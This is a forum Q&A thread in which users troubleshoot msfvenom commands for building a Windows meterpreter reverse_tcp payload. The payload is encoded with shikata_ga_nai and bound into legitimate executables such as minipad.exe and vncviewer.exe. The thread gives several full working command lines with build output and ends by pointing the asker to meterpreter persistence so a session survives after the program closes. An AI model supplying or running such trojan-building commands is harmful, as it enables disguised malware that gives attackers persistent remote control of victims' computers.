0
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.99 LPORT=8080 -a x86 R |msfvenom -e -t exe -x minipad.exe -k -o minipad123.exe -e x86/shikata_ga_nai -c 8


Attempting to read payload from STDIN...

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 299 bytes

Error: You must select an arch for a custom payload

The Architecture has been specified, yet the error persists

Any help??

Nico
  • 1,727
  • 1
  • 24
  • 42
RJ7
  • 1
  • 1
  • 2
  • 4
  • Why have two calls to msfvenom? Wouldn't one call suffice with all the parameters? – Maximilian Gerhardt Sep 05 '15 at 11:23
  • yeah i have tried that as well but in vain... if u feel any particular call will work please post the syntax. Thanks! – RJ7 Sep 05 '15 at 11:28
  • The problem is that with `-c 8` you probably mean that you want 8 iterations, but you do that with the `-i` switch. How about `msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.99 LPORT=8080 --platform win -a x86 -f exe -o minipad123.exe -e x86/shikata_ga_nai -i8 -k -x minipad.exe` ? Atleast the cmd `msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.99 LPORT=8080 --platform win -a x86 -f exe -o test.exe -e x86/shikata_ga_nai -i8` generates a valid executable for me with the `meterpreter/reverse_tcp` payload. All you want in addition is add the payload to an existing file? – Maximilian Gerhardt Sep 05 '15 at 11:32
  • The cmd without the binding works fine for me as well but the first command gives me an error after the iterations. Error: undefined method `encoded' for nil:NilClass – RJ7 Sep 05 '15 at 11:44
  • Works for me. I copied a windows binary to my current directory. `cp /usr/share/windows-binaries/vncviewer.exe .` added the meterpreter payload `$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.99 LPORT=8080 --platform win -a x86 -f exe -o vncviewer_with_metasploit.exe -e x86/shikata_ga_nai -i8 -k -x vncviewer.exe` `Found 1 compatible encoders Attempting to encode payload with 8 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 326 (iteration=0) ... x86/shikata_ga_nai chosen with final size 515 Payload size: 515 bytes Saved as: vncviewer_with_metasploit.exe` – Maximilian Gerhardt Sep 05 '15 at 11:51
  • and what I get seems to be good, atleast the file WITH the meterpreter is 60KB larger than the original. `root@kali:~# ls -lh vncviewer* -rwxr-xr-x 1 root root 356K Sep 5 13:48 vncviewer.exe -rw-r--r-- 1 root root 412K Sep 5 13:48 vncviewer_with_metasploit.exe` – Maximilian Gerhardt Sep 05 '15 at 11:53
  • I have the file minipad.exe in my home folder and I have done the exact same thing but getting the error of undefined method 'encoded'. – RJ7 Sep 05 '15 at 12:31
  • Does this error persist since I'm not using patch?? – RJ7 Sep 05 '15 at 17:07
  • Getting the `Error: undefined method `encoded' for nil:NilClass` error might be a sign of a wrong environment, e.g. broken `ruby` or other `metasploit` stuff. I would download Kali Linux in a virtual machine and try it from this clean state. Does metasploit work correctly currently? – Maximilian Gerhardt Sep 05 '15 at 17:12
  • Yeah it's working fine since whenever I want to create a single file it works well enough... But when I need to bind it doesn't I.e when I use -k -x filename.exe – RJ7 Sep 05 '15 at 18:06
  • Installing Kali Linux on a virtual machine and trying the same from there would work fine?? – RJ7 Sep 05 '15 at 18:16
  • I'm just saying you should have a clean environment to test this, especially because the commands are working fine on my machine. – Maximilian Gerhardt Sep 05 '15 at 18:21
  • Thanks a lot!!!... The idea for a clean environment worked like a charm. it works really well... Just one more question... Do u know any way to bind a text file containing text created by us... what we do works well for .exe files but when we run the same for txt files it throws an error stating: Offset 0 outside of image source?? – RJ7 Sep 07 '15 at 14:17
  • .txt files are non-executable, so the metasploits binding mechanism fails. The `-x – Maximilian Gerhardt Sep 07 '15 at 14:24
  • ok so is there a way to create a batch file that once opened will be present on the system such that even when the executable is closed the session doesnt die?? This can actually be done by using RAT on windows... can this be done on kali linux as well? – RJ7 Sep 07 '15 at 14:55
  • If you're talking about persistance, have a look at what metasploit offers. https://www.offensive-security.com/metasploit-unleashed/meterpreter-service/ – Maximilian Gerhardt Sep 07 '15 at 15:00
  • Thanks!!... i tried persistence but it says Error in script: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: Access is denied....... Then i tried metsvc as well and that also gives an error when i Run mersvc saying cannot open the service manager(0x00000005)... any Idea?? – RJ7 Sep 08 '15 at 01:25
  • Thanks!!...persistence seems to be what I want based on the document but it gives an error. It says Error in script: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: Access is denied....... Then i tried metsvc as well and that also gives an error when i Run mersvc saying cannot open the service manager(0x00000005)... any Idea?? – RJ7 Sep 08 '15 at 02:20
  • Open another question for that. – Maximilian Gerhardt Sep 08 '15 at 12:54
  • Thanks for everything!!. Learnt a lot from uu :). – RJ7 Sep 09 '15 at 09:31

1 Answers1

1

IN kali linux 2.0 sana it necessary to provide information based on following formate

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai --format=exe > windows.exe

it is nessaary to specify the encoding type in kali 2.0

now run the code
change window.exe with location you deserve

Abby Fiz
  • 11
  • 2